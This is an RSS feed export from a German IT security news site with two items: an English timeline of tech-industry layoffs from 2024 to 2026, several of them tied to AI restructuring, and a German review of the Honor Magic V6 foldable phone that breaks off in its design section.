<?xml version="1.0" encoding="UTF-8" ?>
<?xml-stylesheet type="text/xsl" href="/rss-style.xsl"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:media="http://search.yahoo.com/mrss/" xmlns:dc="http://purl.org/dc/elements/1.1/">
<channel>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=this+magic+demystifying+metaverse%2F]]></link>
<description><![CDATA[Das Gesamte Cyber Threat Intelligence Feed-Archiv von TSecurity.de. Alle Nachrichten, Sicherheitsmeldungen, Videos, Downloads und Analysen in einer zentralen Übersicht.]]></description>
<language>de-DE</language>
<lastBuildDate>Tue, 28 Jul 2026 22:36:01 +0200</lastBuildDate>
<pubDate>Tue, 28 Jul 2026 22:36:01 +0200</pubDate>
<ttl>15</ttl>
<copyright>2026 Team IT Security</copyright>
<managingEditor>lakandor@tsecurity.de (Horus Sirius)</managingEditor>
<webMaster>lakandor@tsecurity.de (Horus Sirius)</webMaster>
<category>IT Security</category>
<category>Cybersecurity</category>
<category>Nachrichten</category>
<generator>Team IT Security RSS Generator v2.0</generator>
<image>
<url>https://tsecurity.de/favicon.ico</url>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=this+magic+demystifying+metaverse%2F]]></link>
</image>
<atom:link href="https://tsecurity.de/export/rss/it-security.xml?q=this+magic+demystifying+metaverse%2F" rel="self" type="application/rss+xml" />
<item>
<title><![CDATA[Tech layoffs: A 2026 timeline]]></title>
<description><![CDATA[Among a range of factors leading to a wave of tech sector layoffs in 2026 is the rapid rise of artificial intelligence and automation. Companies are reconfiguring their workforces to leverage AI for increased efficiency and reduced operating costs. This realignment and reduction is implemented ev...]]></description>
<link>https://tsecurity.de/de/3694770/ai-nachrichten/tech-layoffs-a-2026-timeline/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694770/ai-nachrichten/tech-layoffs-a-2026-timeline/</guid>
<pubDate>Sat, 25 Jul 2026 19:50:08 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div><div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Among a range of factors leading to a wave of tech sector layoffs in 2026 is the rapid rise of artificial intelligence and automation. Companies are reconfiguring their workforces to leverage AI for increased efficiency and reduced operating costs. This realignment and reduction is implemented even by companies reporting strong financial performance.</p>



<p class="wp-block-paragraph">But it’s not just AI leading to workforce cuts. Complementing this technological shift are ongoing economic uncertainty, inflation, and higher interest rates, compounded by a chip shortage and rising energy costs. This mix is driving companies to cut costs and streamline operations for increased efficiency.</p>



<p class="wp-block-paragraph">According to data compiled by <a href="https://layoffs.fyi/" target="_blank" rel="noreferrer noopener">Layoffs.fyi</a>, an online tracker that keep tabs on job losses in the technology sector, 123,941 tech employees were laid off at 269 companies in 2025. The site also reports that 71,981 government employees were laid off by DOGE alone, with 182,528 total federal workers laid off.</p>



<p class="wp-block-paragraph">Here is a list — to be updated regularly — of some of the most prominent technology layoffs the industry has experienced recently.</p>



<h2 class="wp-block-heading">Notable tech layoffs in 2026</h2>



<ul class="wp-block-list">
<li>Monday.com</li>



<li>Microsoft</li>



<li>Meta</li>



<li>Cisco</li>



<li>Cloudflare</li>



<li>Oracle</li>



<li>Atlassian </li>



<li>Salesforce</li>



<li>Amazon</li>



<li>Ericsson</li>
</ul>



<h3 class="wp-block-heading">July 22, 2026: Monday.com cuts 20% of its workforce to restructure for the AI era</h3>



<p class="wp-block-paragraph">The company says the decision to <a href="https://www.computerworld.com/article/4200349/monday-com-cuts-20-of-its-workforce-to-restructure-for-the-ai-era-2.html">cut 620 jobs</a> isn’t about margins, but about creating a flatter organization built around AI agents, autonomous teams, and deeper customer engagement.</p>



<h3 class="wp-block-heading">July 6, 2026: Microsoft cuts 4,800 jobs, primarily in sales and Xbox teams</h3>



<p class="wp-block-paragraph">As the company <a href="https://www.computerworld.com/article/4193532/microsoft-bets-that-enterprise-ai-needs-engineers-not-bigger-sales-teams-2.html" target="_blank">trims thousands of jobs</a>, it’s also investing in embedded engineering teams and AI infrastructure. The layoffs come several weeks after the company offered 8,750 US employees <a href="https://www.computerworld.com/article/4163188/microsoft-to-offer-voluntary-retirement-buyouts-to-about-7-of-the-us-workforce.html">voluntary retirement buyouts</a>.</p>



<h3 class="wp-block-heading">June 5, 2026: Tech industry cut 38,242 jobs in May, worst since 2024</h3>



<p class="wp-block-paragraph">AI was blamed for 40% of <a href="https://www.computerworld.com/article/4181822/tech-industry-cut-38242-jobs-in-may-worst-since-2024.html">the job cuts in May</a>, up from 7% in January, according to research by employment placement company Challenger, Gray &amp; Christmas.</p>



<h3 class="wp-block-heading">May 20, 2026: Meta cuts 8,000 jobs, around 10% of workforce</h3>



<p class="wp-block-paragraph">The cuts are expected to expected to hit Meta’s engineering and product teams the hardest, arriving as Meta pivots toward AI to boost efficiency across its organization, <a href="https://tech.yahoo.com/general/article/meta-starts-cutting-8000-jobs-as-part-of-previously-announced-layoffs-145220586.html" target="_blank" rel="noreferrer noopener">according to Yahoo Tech</a>.</p>



<h3 class="wp-block-heading">May 13, 2026: Cisco to cut nearly 4,000 jobs despite strong growth in AI, enterprise networking</h3>



<p class="wp-block-paragraph">Despite reporting positive financial news — including record third-quarter revenue of $15.8 billion, a 12% year-over-year increase — Cisco said it will <a href="https://www.networkworld.com/article/4171043/cisco-to-cut-nearly-4000-jobs-despite-strong-growth-in-ai-enterprise-networking.html" target="_blank">eliminate almost 4,000 jobs</a>.</p>



<h3 class="wp-block-heading">May 7, 2026: Cloudflare to cut 1,100 jobs in AI-focused restructuring</h3>



<p class="wp-block-paragraph">About <a href="https://finance.yahoo.com/markets/stocks/articles/cloudflare-cut-over-1-100-204726989.html" target="_blank" rel="noreferrer noopener">20% of Cloudflare’s global workforce will be culled</a> as the company pivots for the agentic AI era, Reuters reported.</p>



<h3 class="wp-block-heading">April 1, 2026: Oracle to cut up to 30,000 jobs globally, putting enterprise support and roadmaps at risk</h3>



<p class="wp-block-paragraph"><a href="https://www.cio.com/article/4153113/oracle-cuts-up-to-30000-jobs-globally-putting-enterprise-support-and-roadmaps-at-risk.html">Oracle began laying off employees</a> on March 31 in what could be the largest workforce reduction in the company’s history. Employees received termination emails at 6 a.m. local time with immediate system lockouts and no prior warning. <em>(Note: in June, CNBC put the <a href="https://www.cnbc.com/2026/06/23/oracle-ai-job-cuts-layoffs-21000.html" target="_blank" rel="noreferrer noopener">final layoff tally at 21,000</a>.)</em></p>



<h3 class="wp-block-heading">March 12, 2026: Atlassian cuts 1,600 jobs to fund AI and enterprise expansion</h3>



<p class="wp-block-paragraph"><a href="https://www.computerworld.com/article/4144218/atlassian-cuts-1600-jobs-to-fund-ai-and-enterprise-expansion.html">Atlassian will reduce its global workforce</a> by approximately 10%, eliminating around 1,600 roles, as the collaboration software maker redirects capital toward artificial intelligence development and enterprise sales.</p>



<h3 class="wp-block-heading">March 11, 2026: Tech layoffs surpass 45,000 in early 2026</h3>



<p class="wp-block-paragraph">A recent analysis by RationalFX found 45,363 job cuts globally so far this year—with roughly 68% or more than 30,000 occurring in the U.S. — highlighting ongoing <a href="https://www.networkworld.com/article/4143749/tech-layoffs-surpass-45000-in-early-2026.html" target="_blank">workforce cuts even as many tech companies report strong revenue growth</a>.</p>



<h3 class="wp-block-heading">February 10, 2026: Salesforce lays off staffers as executive leadership churn continues</h3>



<p class="wp-block-paragraph"><a href="https://www.cio.com/article/4130028/salesforce-lays-off-staffers-as-executive-leadership-churn-continues.html" target="_blank">Salesforce has reduced close to 1,000 roles</a> earlier this month across teams, including marketing, product management, data analytics, and its <a href="https://www.cio.com/article/4011936/salesforce-agentforce-3-promises-new-ways-to-monitor-and-manage-ai-agents.html">Agentforce</a> AI unit, <a href="https://www.businessinsider.com/salesforce-cuts-jobs-executive-changes-2026-2">Business Insider</a> reported, quoting employees familiar with the matter.</p>



<h3 class="wp-block-heading">January 23, 2026: Amazon layoffs expected to disproportionately hit AWS and tech talent</h3>



<p class="wp-block-paragraph">As the market slows down, <a href="https://www.computerworld.com/article/4121653/amazon-layoffs-expected-to-disproportionately-hit-aws-and-tech-talent.html">AWS and other Amazon units are preparing for another round of layoffs</a>, which is expected to overwhelmingly impact tech talent. An email from HR leader Beth Galetti on Jan. 28 <a href="https://www.computerworld.com/article/4123477/amazon-confirms-16000-job-cuts-including-to-aws.html">confirmed 16,000 job cuts</a>.</p>



<h3 class="wp-block-heading">January 15, 2026: Ericsson plans to shed 1,600 jobs in Sweden</h3>



<p class="wp-block-paragraph"> Ericsson lans to cut some 1,600 jobs in Sweden, the telecommunications equipment maker said doubling down on recent cost-saving measures that have helped it weather a prolonged downturn in telecoms spending, <a href="https://www.reuters.com/business/world-at-work/ericsson-shed-1600-jobs-sweden-2026-01-15/" target="_blank" rel="noreferrer noopener">Reuters reports</a>.</p>



<h3 class="wp-block-heading">January 13, 2026: Meta plans to cut around 10% of employees in Reality Labs business</h3>



<p class="wp-block-paragraph">Meta plans to cut around 10% of the employees in its Reality Labs division who work on products including the metaverse, according to three people with knowledge of the discussions, <a href="http://meta%20plans%20to%20cut%20around%2010%25%20of%20employees%20in%20reality%20labs%20business/" target="_blank" rel="noreferrer noopener">according to The New York Times</a>.</p>



<h2 class="wp-block-heading">Layoffs in 2025</h2>



<ul class="wp-block-list">
<li>Cisco</li>



<li>Oracle</li>



<li>Windsurf</li>



<li>Intel</li>



<li>Microsoft</li>



<li>Crowdstrike</li>



<li>HPE</li>



<li>Autodesk</li>



<li>HPE</li>



<li>CISA</li>



<li>Workday</li>



<li>Salesforce</li>



<li>Meta</li>
</ul>



<h3 class="wp-block-heading">Global tech-sector layoffs surpass 244,000 in 2025</h3>



<p class="wp-block-paragraph">Economic uncertainty, elevated interest rates, and AI adoption have <a href="https://www.networkworld.com/article/4114572/global-tech-sector-layoffs-surpass-244000-in-2025.html" target="_blank">driven workforce reductions across tech companies worldwide</a>, according to a RationalFX report.</p>



<h3 class="wp-block-heading">October 28, 2025: Amazon to cut 14,000 jobs across company</h3>



<p class="wp-block-paragraph"><a href="https://www.computerworld.com/article/4080142/amazon-to-cut-14000-jobs-across-company.html">Amazon will reduce its overall workforce</a> by 14,000, cutting layers of management across the company and hiring in some areas to support its “biggest bets”.</p>



<h3 class="wp-block-heading">August 18, 2025: Cisco and Oracle to cut hundreds of Bay Area jobs</h3>



<p class="wp-block-paragraph">Tech companies Cisco and Oracle are <a href="https://www.sfchronicle.com/tech/article/cisco-oracle-layoffs-bay-area-20824135.php" target="_blank" rel="noreferrer noopener">cutting hundreds of jobs across the Bay Area</a>. Cisco will eliminate 221 positions at its Milpitas and San Francisco offices, effective Oct. 13. Oracle is reducing 101 positions in Santa Clara on the same date </p>



<h3 class="wp-block-heading">August 5, 2025: 3 weeks after acquiring Windsurf, Cognition offers staff the exit door</h3>



<p class="wp-block-paragraph">Cognition, the AI coding startup that acquired rival company Windsurf three weeks ago, laid off 30 employees last week and is offering buyouts to the roughly 200 remaining employees on the team, <a href="https://www.theinformation.com/articles/cognition-offers-buyouts-newly-acquired-windsurf-staff" target="_blank" rel="noreferrer noopener">reports The Information</a>.</p>



<h3 class="wp-block-heading">July 25, 2025, Intel to lay off 22% of workforce, CEO Tan signals ‘no more blank checks’</h3>



<p class="wp-block-paragraph"><a href="https://www.computerworld.com/article/4028896/intel-to-lay-off-22-of-workforce-as-ceo-tan-signals-no-more-blank-checks.html">Intel will reduce its workforce to 75,000 employees</a> by the end of 2025 as new CEO Lip-Bu Tan implements sweeping changes designed to transform the struggling chipmaker</p>



<h3 class="wp-block-heading">July 8, 2025, Intel layoffs begin: Chipmaker is cutting many thousands of jobs</h3>



<p class="wp-block-paragraph">Intel has begun laying off employees across the company. CEO Lip-Bu Tan told workers back in April to expect <a href="https://www.oregonlive.com/silicon-forest/2025/07/intel-layoffs-begin-chipmaker-is-cutting-many-thousands-of-jobs.html">major layoffs at Intel </a>in the coming months as the chipmaker slashes costs and overhauls its organization after years of technical setbacks and falling sales. </p>



<h3 class="wp-block-heading">July 2, 2025: Microsoft will cut 9,000 workers</h3>



<p class="wp-block-paragraph">Microsoft will lay off about 9,000 employees, a source familiar with the workforce cut <a href="https://www.nbcnews.com/business/business-news/microsoft-laying-9000-employees-latest-cuts-rcna216553">told CNBC</a>.  The cuts will reportedly affect less than 4% of Microsoft’s global workforce and will impact different teams, geographies and levels of experience. This is the latest in a string of cuts the tech giant has made this year.</p>



<h3 class="wp-block-heading">June 17, 2025: Intel looks to factory layoffs to return to profitability</h3>



<p class="wp-block-paragraph"><a href="https://www.networkworld.com/article/4008670/can-intel-cut-its-way-to-profit-with-factory-layoffs.html">Intel will lay off up to 20% of its manufacturing sector employees</a> starting in July,  according to media reports, as the company looks for options as it seeks a return to profitability. The cuts reportedly will be made around the world, but some of the layoffs will be closer to home, according to a report in The Oregonian citing an internal company memo from Intel manufacturing Vice President Naga Chandrasekaran.</p>



<h3 class="wp-block-heading">May 7, 2025: CrowdStrike to lay off 5% of staff</h3>



<p class="wp-block-paragraph"><a href="https://www.reuters.com/sustainability/crowdstrike-lay-off-5-staff-reaffirms-forecasts-2025-05-07/">CrowdStrike announced a plan to cut about 500 roles</a>, roughly 5% of its workforce, to streamline operations and reduce costs. The cybersecurity company will incur about $36 million to $53 million in charges related to the layoffs</p>



<h3 class="wp-block-heading">March 6, 2025: HPE cuts 2,500 jobs, remains committed to Juniper buy</h3>



<p class="wp-block-paragraph">CEO Antonio Neri told Wall Street analysts that <a href="https://www.networkworld.com/article/3840596/hpe-cuts-2500-workers-expects-juniper-buy-to-close-end-of-25-faces-tariff-issues.html">HPE would begin implementing a cost-cutting program involving layoffs </a>of about 2,500 employees over the next 18 months. HPE employs about 61,000 people worldwide.</p>



<h3 class="wp-block-heading">Feb. 27, 2025: Autodesk to lay off 9% of workforce</h3>



<p class="wp-block-paragraph">Software maker Autodesk is laying off 1,350 staff. With the rise of subscription and multi-year contracts billed annually, and self-service enablement, it finds it needs fewer sales staff, <a href="https://adsknews.autodesk.com/en/news/022725-employee-message/">CEO Andrew Anagnost said in a message to employees</a>. And with its cloud, platform, and AI products proving most profitable, it’s concentrating its staff and investments there. </p>



<h3 class="wp-block-heading">Feb. 27, 2025: HP to lay off 2,000 more</h3>



<p class="wp-block-paragraph">As part of an ongoing restructuring, HP plans to lay off up to another 2,000 workers. In recent weeks, the company has tried — unsuccessfully — to do away with telephone support staff by <a href="https://www.pcworld.com/article/2617767/hp-forced-callers-to-wait-15-minutes-before-connecting-to-support-staff.html">forcing callers to wait for at least 15 minutes</a> if they refuse to use self-service support resources online. The company swiftly backtracked, but wider job cuts are still on. </p>



<h3 class="wp-block-heading">Feb. 21, 2025: <a href="https://www.csoonline.com/article/3829710/firing-of-130-cisa-staff-worries-cybersecurity-industry.html">CISA lays off 130</a></h3>



<p class="wp-block-paragraph">Government employees get laid off too: In this case, 130 workers at the US Cybersecurity and Infrastructure Security Agency are being shown the door as a result of a DOGE decision. Cybersecurity experts are concerned that the cuts will harm the international collaborations that CISA has fostered, quite apart from their concerns about the security of the DOGE layoff process itself.</p>



<h3 class="wp-block-heading">Feb. 5, 2025: <a href="https://www.computerworld.com/article/3817887/workday-to-cut-1750-jobs-shift-focus-to-ai-and-global-expansion.html">Workday lays off 1,750</a></h3>



<p class="wp-block-paragraph">As it moves to invest more in AI and international growth, Workday is laying off 8.5% of its workforce and disposing of unused office space. Some analysts fear the cutbacks will affect the company’s customer service — unless AI can pick up the slack.</p>



<h3 class="wp-block-heading">Feb. 4, 2025: Salesforce lays off over 1,000</h3>



<p class="wp-block-paragraph">At the same time as it’s hiring sales staff for its new artificial intelligence products, Salesforce is laying off over 1,000 workers across the company, according to Bloomberg. As of June, 2024, the company had over 72,000 employees, according to its website. Salesforce did not comment on the report. In 2024 the company reportedly laid off around 1,000 staff too, in two waves: January and July.</p>



<h3 class="wp-block-heading">Jan. 14, 2025: Meta will lay off 5% of workforce</h3>



<p class="wp-block-paragraph">Mark Zuckerberg told Meta employees he intended to “move out the low performers faster” in an internal memo reported by Bloomberg. The memo announced that the company will lay off 5% of its staff, or around 3,600 staff, beginning Feb. 10. The company had already reduced its headcount by 5% in 2024 through natural attrition, the memo said. Among those leaving the company will be staff previously responsible for fact checking of posts on its social media platforms in the US, as the company begins relying on its users to police content.</p>



<h2 class="wp-block-heading">Tech layoffs in 2024</h2>



<ul class="wp-block-list">
<li>Equinix</li>



<li>AMD</li>



<li>Freshworks</li>



<li>Cisco</li>



<li>General Motors</li>



<li>Intel</li>



<li>OpenText</li>



<li>Microsoft</li>



<li>AWS</li>



<li>Dell</li>
</ul>



<h3 class="wp-block-heading">Nov. 26, 2024: <a href="https://www.networkworld.com/article/3613399/equinix-to-cut-3-of-staff-amidst-the-greatest-demand-for-data-center-infrastructure-ever.html">Equinix to cut 3% of staff</a></h3>



<p class="wp-block-paragraph">Despite intense demand for its data center capacity, Equinix is planning to lay off 3% of its workforce, or around 400 employees. The announcement followed the appointment of Adaire Fox-Martin to replace Charles Meyers as CEO and the departures of two other senior executives, CIO Milind Wagle and CISO Michael Montoya.</p>



<h3 class="wp-block-heading">Nov. 13, 2024: <a href="https://www.networkworld.com/article/3605016/amd-to-cut-4-of-workforce-to-prioritize-ai-chip-expansion-to-rival-nvidia.html#:~:text=Workforce%20reduction%20comes%20amid%20strong,shift%20in%20focus%20toward%20AI.&amp;text=Advanced%20Micro%20Devices%20(AMD)%20is,Nvidia's%20lead%20in%20the%20sector.">AMD to cut 4% of workforce</a></h3>



<p class="wp-block-paragraph">AMD will lay off around 1,000 employees as it pivots towards developing AI-focused chips, it said. The move came as a surprise to staff, as the company also reported strong quarterly earnings. </p>



<h3 class="wp-block-heading">Nov. 7, 2024: <a href="https://www.cio.com/article/3601088/freshworks-lays-off-660-about-13-percent-of-its-global-workforce-despite-strong-earnings-profits.html">Freshworks lays off 660</a></h3>



<p class="wp-block-paragraph">Enterprise software vendor Freshworks laid off around 660 staff, or around 13% of its headcount, despite reporting increased revenue and profits in its fourth fiscal quarter. The company described the layoffs as a realignment of its global workforce.</p>



<h3 class="wp-block-heading">Sept. 17, 2024: <a href="https://www.networkworld.com/article/3486901/cisco-to-cut-7-of-workforce-restructure-product-groups.html">Cisco lays off 6,000</a></h3>



<p class="wp-block-paragraph">After laying off around 4,200 staff in February, Cisco is at it again, laying off another 6,000 or around 7% of its workforce. Among the divisions affected were its threat intelligence unit, Talos Security. </p>



<h3 class="wp-block-heading">Aug. 20, 2024: <a href="https://www.cio.com/article/3489323/gm-software-layoffs-could-signal-a-shift-in-digital-transformation-strategy.html">General Motors lays off 1,000 software staff</a></h3>



<p class="wp-block-paragraph">More than 1,000 software and services staff are on the way out at General Motors, signalling that it could be rethinking its digital transformation strategy. In an internal memo, the company said that it was moving resources to its highest-priority work and flattening hierarchies.</p>



<h3 class="wp-block-heading">August 1, 2024: <a href="https://www.computerworld.com/article/3480715/intel-fires-15000-employees-as-it-intensifies-focus-on-ai.html">Intel removes 15,000 roles</a></h3>



<p class="wp-block-paragraph">Intel plans to cut its workforce by around 15% to reduce costs after a disastrous second quarter. Revenue for the three months to June 29 stagnated at around $12.8 billion, but net income fell 85% to $83 million, prompting CEO Pat Gelsinger to bring forward a company-wide meeting in order to announce that 15,000 staff would lose their jobs. “This is an incredibly hard day for Intel as we are making some of the most consequential changes in our company’s history,” Gelsinger wrote in an email to staff, continuing: “Our revenues have not grown as expected — and we’ve yet to fully benefit from powerful trends, like AI. Our costs are too high, our margins are too low. We need bolder actions to address both — particularly given our financial results and outlook for the second half of 2024, which is tougher than previously expected.”</p>



<h3 class="wp-block-heading">July 4, 2024: <a href="https://www.computerworld.es/article/2513686/opentext-despedira-a-cerca-de-1-200-empleados.html">OpenText to lay off 1,200</a></h3>



<p class="wp-block-paragraph">OpenText said it will lay off 1,200 staff, or about 1.7% of its workforce, in a bid to save around $100 million annually. It plans to hire new sales and engineering staff in other areas in 2025, it said.</p>



<h3 class="wp-block-heading">June 4, 2024: <a href="https://www.networkworld.com/article/2138075/microsoft-lays-off-staffers-from-its-azure-division.html">Microsoft lays off staff in Azure division</a></h3>



<p class="wp-block-paragraph">Microsoft laid off staff in several teams supporting its cloud services, including Azure for Operations and Mission Engineering. The company didn’t say exactly how many staff were leaving.</p>



<h3 class="wp-block-heading">April 4, 2024: <a href="https://www.cio.com/article/2081437/amazon-downsizes-aws-in-a-fresh-cost-cutting-round.html">Amazon downsizes AWS</a> in a fresh cost-cutting round</h3>



<p class="wp-block-paragraph">Amazon announced hundreds of layoffs in the sales and marketing teams of its AWS cloud services division — and also in the technology development teams for its physical retail stores, as it stepped back from efforts to generalize the “<a href="https://www.cio.com/article/2079910/amazon-drops-just-walk-out-technology-at-its-us-retail-locations.html">Just Walk Out</a>” technology built for its Amazon Fresh grocery stores. </p>



<h3 class="wp-block-heading">April 1, 2024: <a href="https://investors.delltechnologies.com/static-files/d6e82f58-d417-422f-b2f3-4d08d498abd4" target="_blank" rel="noreferrer noopener">Dell acknowledges 13,000 job cuts</a></h3>



<p class="wp-block-paragraph">Dell Technologies’ <a href="https://investors.delltechnologies.com/static-files/d6e82f58-d417-422f-b2f3-4d08d498abd4" target="_blank" rel="noreferrer noopener">latest 10K filing with the US Securities and Exchange Commission</a> disclosed that the company had laid off 13,000 employees over the course of the 2023 fiscal year; it characterized the layoffs and other reorganizational moves as cost-cutting measures. “These actions resulted in a reduction in our overall headcount,” the company said. A comparison to the previous year’s 10K filing, performed by The Register, found that Dell employed 133,000 people at that point, compared to 120,000 as of February 2024. Dell announced layoffs of 6,650 staffers on Feb. 6, but it is unclear whether those cuts were reflected in the numbers from this year’s 10K statement.</p>



<p class="wp-block-paragraph"><em><a href="https://www.computerworld.com/article/3816662/tech-layoffs-in-2024-a-timeline.html">See news of earlier layoffs.</a></em></p>



<p class="wp-block-paragraph"></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Honor Magic V6 im Test: Das fast perfekte Foldable]]></title>
<description><![CDATA[Luke Baker



Auf einen Blick



Pro




Wunderschönes, schlankes Design



Große, helle Displays



Hervorragende Kameras



Coole Software-Funktionen




Kontra




Hoher Preis



MagicOS kann gelegentlich frustrierend sein




Fazit



Das Honor Magic V6 ist ein Falt-Smartphone, das einfach al...]]></description>
<link>https://tsecurity.de/de/3694426/it-security-nachrichten/honor-magic-v6-im-test-das-fast-perfekte-foldable/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694426/it-security-nachrichten/honor-magic-v6-im-test-das-fast-perfekte-foldable/</guid>
<pubDate>Sat, 25 Jul 2026 18:59:23 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-19-um-21.52.53.png?w=1024" alt="Honor Magic V6" class="wp-image-4198590" width="1024" height="586" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Luke Baker</p></div>



<h2 class="wp-block-heading">Auf einen Blick</h2>



<h3 class="wp-block-heading">Pro</h3>



<ul class="wp-block-list">
<li>Wunderschönes, schlankes Design</li>



<li>Große, helle Displays</li>



<li>Hervorragende Kameras</li>



<li>Coole Software-Funktionen</li>
</ul>



<h3 class="wp-block-heading">Kontra</h3>



<ul class="wp-block-list">
<li>Hoher Preis</li>



<li>MagicOS kann gelegentlich frustrierend sein</li>
</ul>



<h3 class="wp-block-heading">Fazit</h3>



<p class="wp-block-paragraph">Das Honor Magic V6 ist ein Falt-Smartphone, das einfach alles kann. Es ist schlank, robust, leistungsstark und sieht gut aus. Die Kameras gehören zu den besten, die Software bietet einige raffinierte Funktionen und die Akkulaufzeit ist außergewöhnlich. Besitzer eines Magic V5 werden wahrscheinlich kaum einen Grund für ein Upgrade sehen, aber für alle anderen ist es eine gute Wahl – sofern Sie es sich leisten können.</p>



<p class="wp-block-paragraph">Das Honor Magic V6 wurde ursprünglich bereits im März in China vorgestellt, doch es dauerte eine Weile, bis es den Weg nach Europa fand. Nun ist es endlich in Europa erhältlich und strebt den Titel des bislang <a href="https://www.pcwelt.de/article/2109390/bestes-falt-smartphone.html" target="_blank">besten Falt-Smartphones</a> an.</p>



<p class="wp-block-paragraph">Leider ist die Konkurrenz für Honor stärker denn je, und sie wird noch härter werden, sobald Apples seit Langem gemunkeltes Foldable auf den Markt kommt. Bietet dieses schlanke Kraftpaket genug, um weiterhin überzeugend zu bleiben?</p>



<p class="wp-block-paragraph">Es sieht auf jeden Fall vielversprechend aus, verfügt über einen der größten Akkus aller jemals erschienenen Falt-Smartphones, ist das erste mit IP69-Zertifizierung und gehört dennoch zu den dünnsten Modellen. Das ist schon mal ein guter Anfang. Ich habe es in den vergangenen Wochen auf Herz und Nieren geprüft, und hier ist mein Fazit.</p>



<h2 class="wp-block-heading">Design &amp; Verarbeitung</h2>



<ul class="wp-block-list">
<li>Aluminiumrahmen, Rückseite aus Verbundfasermaterial</li>



<li>219 g, NanoCrystal Shield-Glas</li>



<li>IP69-zertifiziert</li>
</ul>



<p class="wp-block-paragraph">Das Honor Magic V6 sieht dem <a href="https://www.pcwelt.de/article/2838914/honor-magic-v5-test.html" target="_blank">Magic V5</a> sehr ähnlich, wobei der auffälligste Unterschied in der Form des Kamerarahmens liegt. Dieser ist nun kantiger und weist eine achteckige Form auf. Auch neue Farbvarianten tragen dazu bei, es von der Vorgängergeneration abzugrenzen.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-19-um-22.14.26.png?w=1024" alt="Honor Magic V6" class="wp-image-4199606" width="1024" height="586" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Luke Baker</p></div>



<p class="wp-block-paragraph">Die rote Version ist wahrscheinlich die auffälligste; sie verfügt über eine tiefrote, fast blutrote Rückseite mit strukturierter Oberfläche. Ich besitze die goldene Version, die ebenfalls sehr auffällig ist. Freunde haben bemerkt, dass es wie ein Smartphone aussieht, das ein saudischer Prinz oder Kim Kardashian benutzen würde.</p>



<p class="wp-block-paragraph">Die Farbe schimmert leicht, wenn Licht darauf fällt; sowohl am Scharnier als auch auf der Rückseite ist ein dezentes, sich wiederholendes Dreiecksmuster zu erkennen, und es bleibt irgendwie frei von Fingerabdrücken, obwohl es ziemlich glänzend ist. Das sieht wirklich cool aus. Auch die mitgelieferte Hülle ist von höchster Qualität, mit einem cremefarbenen Kunstlederbezug und einem roségoldenen Kamerarahmen, der gleichzeitig als ausklappbarer Ständer dient.</p>



<p class="wp-block-paragraph">Wenn Sie etwas suchen, das etwas weniger Aufmerksamkeit auf sich zieht, gibt es natürlich auch traditionellere Modelle in Schwarz und Weiß. Letzteres hat zudem einen versteckten Vorteil: Mit nur 8,75 Millimetern im geschlossenen Zustand ist es das dünnste Modell der Reihe, und Honor geht davon aus, dass es derzeit das dünnste Falt-Smartphone auf dem Markt ist.</p>



<p class="wp-block-paragraph">Ich habe das weiße Modell nicht ausprobiert, und vielleicht ist es tatsächlich spürbar schlanker, aber meiner Meinung nach sieht die goldene Version definitiv etwas dicker aus und fühlt sich auch so wie mein 8,9 Millimeter dickes <a href="https://www.pcwelt.de/article/2843601/samsung-galaxy-z-fold-7-test.html" target="_blank">Galaxy Z Fold 7</a> an.</p>



<p class="wp-block-paragraph">Das ist allerdings Haarspalterei, denn dieses Smartphone ist immer noch dünner als viele Flaggschiff-Smartphones im Barrenformat. Ob es nun das dünnste ist oder nicht – es ist auf jeden Fall dünn genug, um sich in der Hosentasche angenehm anzufühlen.<br><br></p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-19-um-22.14.34.png?w=1024" alt="Honor Magic V6" class="wp-image-4199607" width="1024" height="586" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Luke Baker</p></div>



<p class="wp-block-paragraph">Erwähnenswert ist auch, dass das Cover-Display nun flach ist und eine symmetrischere Form aufweist. Dadurch sieht das Smartphone im zusammengeklappten Zustand noch mehr wie ein herkömmliches Barren-Handy aus, doch die unvermeidliche, eckige Kante am Scharnier verrät es ein wenig.<br><br></p>



<p class="wp-block-paragraph">So wichtig die Abmessungen eines Klapphandys auch sind, ebenso entscheidend ist die Robustheit. Und glücklicherweise ist das Honor Magic V6 robust wie ein Panzer gebaut.</p>



<p class="wp-block-paragraph">Es verfügt über die Schutzklasse IP69 – die höchste aller faltbaren Smartphones. Das bedeutet, dass es praktisch staubdicht ist und sowohl das Eintauchen in Süßwasser als auch den Strahl von heißem Wasser problemlos aushält. Die Technologie der faltbaren Smartphones hat große Fortschritte gemacht.</p>



